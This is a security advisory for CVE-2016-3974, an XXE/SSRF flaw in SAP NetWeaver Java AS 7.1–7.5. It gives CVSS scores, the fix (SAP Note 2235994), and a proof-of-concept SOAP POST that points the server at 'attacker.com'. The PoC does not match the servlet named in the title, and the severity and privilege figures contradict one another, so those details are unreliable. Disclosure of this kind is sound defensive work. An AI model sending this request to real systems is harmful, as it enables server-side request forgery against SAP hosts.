ERPScanERPSCAN-16-013SAP NetWeaver Java AS ctcprotocol servlet - XXE vulnerability
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
0.011 Low
EPSS
Percentile
82.9%
Application: SAP NetWeaver **Versions Affected:**SAP NetWeaver 7.1 – 7.5 Vendor URL: SAP **Bug:**XXE **Reported:**20.10.2015 **Vendor response:**21.10.2015 **Date of Public Advisory:**08.03.2016 **Reference:**SAP Security Note 2235994 Author: Vahagn Vardanyan (ERPScan)
VULNERABILITY INFORMATION
Class: XXE
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE-2016-3974
CVSS Information
CVSS Base Score v3: 6.4 / 10
CVSS Base Vector:
| AV : Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC : Attack Complexity (Required attack complexity) | High (H) |
| PR : Privileges Required (Level of privileges needed to exploit) | High (H) |
| UI : User Interaction (Required user participation) | None (N) |
| S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C : Impact to Confidentiality | High (H) |
| I : Impact to Integrity | High (H) |
| A : Impact to Availability | High (H) |
Description
Authorized attacker can use a special request to read files from the server and then escalate his or her privileges.
Business risk
Attackers can send any packets to any port of any system, including localhosts.
It means that it is possible, for example, to send any administrative command to Gateway or Message Server because the source of the packet will be localhost, and there are no restrictions for localhost. Another example is an attack on other interfaces.
VULNERABLE PACKAGES
SAP NetWeaver AS JAVA 7.1 – 7.5
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2235994.
TECHNICAL DESCRIPTION
An XML external entity (XXE) vulnerability in the Configuration Wizard in SAP NetWeaver Java AS 7.4 allows remote attackers to cause a denial of service, conduct SMB Relay attacks, or access arbitrary files via a crafted XML request related to the ctcprotocol servlet.
PoC
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1 Content-Type: text/xml <SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:SOAP-ENC=“http://schemas.xmlsoap.org/soap/encoding/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=“http://www.w3.org/2001/XMLSchema”> <SOAP-ENV:Body> <m:XXX xmlns:m=“http://sap.com/monitoring/ws/sn/”> <url>attacker.com</url> </m:XXX> </SOAP-ENV:Body> </SOAP-ENV:Envelope>
1
2
3
4
5
6
7
8
9
10
|
POST /_tc~monitoring~webservice~web/ServerNodesWSService HTTP/1.1
Content-Type: text/xml
<SOAP-ENV:Envelope xmlns:SOAP-ENV=“http://schemas.xmlsoap.org/soap/envelope/” xmlns:SOAP-ENC=“http://schemas.xmlsoap.org/soap/encoding/” xmlns:xsi=“http://www.w3.org/2001/XMLSchema-instance” xmlns:xsd=“http://www.w3.org/2001/XMLSchema”>
<SOAP-ENV:Body>
<m:XXX xmlns:m=“http://sap.com/monitoring/ws/sn/”>
<url>attacker.com</url>
</m:XXX>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
—|—
Related
9.1 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
6.4 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:N/A:P
0.011 Low
EPSS
Percentile
82.9%